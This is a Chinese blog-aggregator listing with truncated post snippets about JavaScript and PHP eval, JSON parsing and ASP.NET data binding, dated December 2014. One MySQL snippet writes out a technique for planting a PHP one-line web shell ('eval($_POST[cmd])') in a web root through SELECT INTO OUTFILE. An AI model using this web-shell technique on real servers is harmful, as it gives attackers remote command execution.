针对 PHP 的网站主要存在下面几种攻击方式::1、命令注入(Command Injection)2、eval 注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL 注入攻击(SQ...
分类:
Web程序 时间:
2014-12-25 19:58:20
阅读次数:
306
弹出页面前调用action方法给allSupply附上值var allSupply=${allSupply};//供应商{field:'supId',title:'供应商',formatter:function(value){ var tempArry = eval(allSupply...
分类:
其他好文 时间:
2014-12-24 19:53:51
阅读次数:
176
今天谈下.NET中的数据绑定表达式。数据绑定表达式必须包含在字符之间。格式如下:'runat="server"/>或者如下:ASP.NET 支持分层数据绑定模型,数据绑定表达式使用Eval和Bind方法将数据绑定到控件,并将更改提交回数据库。 Eval方法是静态单向(只读)方法,所以Eval函...
分类:
Web程序 时间:
2014-12-24 11:19:01
阅读次数:
165
MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES(<?phpeval($_POST[cmd]);?>);//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表..
分类:
数据库 时间:
2014-12-24 06:30:25
阅读次数:
237
Array.prototype.IndexOf = function (exp) { var isexp = exp.indexOf('=>') > -1, bef = isexp ? exp.split('=>')[0] : '', expstr = isexp ? exp....
分类:
编程语言 时间:
2014-12-22 14:09:37
阅读次数:
161
1) Js的引入顺序不正确,导致highchart的图表出不来,
因为Highchart插件中用到了jquery,jquery的js要在引入highchart的js之前引入,否则当会导致当加载highchart插件用到的js时,找不到jquery的js,报出某个js的函数不合法,Higchart图表无法显示。
2)后台传入的JSON格式数据,需要用eval函数处理一下,否则图表也无法...
分类:
其他好文 时间:
2014-12-22 11:18:45
阅读次数:
154
看到《js语言精髓与编程实践》中讲解的js语法中运算符的二义性之逗号的二义性,做些笔记 我们先来看看这两个例子: alert(eval('a=(1,2,3);'));//示例1
alert(eval('a=1,2,3;'));//示例2结果是两者都会弹出3,这种用法产生的混乱,是因为逗号“,”既可以...
分类:
Web程序 时间:
2014-12-20 16:47:10
阅读次数:
238
关于火狐执行var obj = eval('(' + data + ')');时 报SyntaxError: missing ] after element list错误,Chrome和IE正常情形如下:当使用ajax接收从后台传递过来的json数据时$.ajax( {
type : "POST",
dataType : "json",
url : "RegisterAction.actio...
分类:
其他好文 时间:
2014-12-18 00:22:24
阅读次数:
165
如果您想详细了解eval和JSON请参考以下链接:eval :https://developer.mozilla.org/En/Core_JavaScript_1.5_Reference/Global_Functions/EvalJSON:http://www.json.org/eval函数的工作原...
分类:
其他好文 时间:
2014-12-17 10:45:54
阅读次数:
224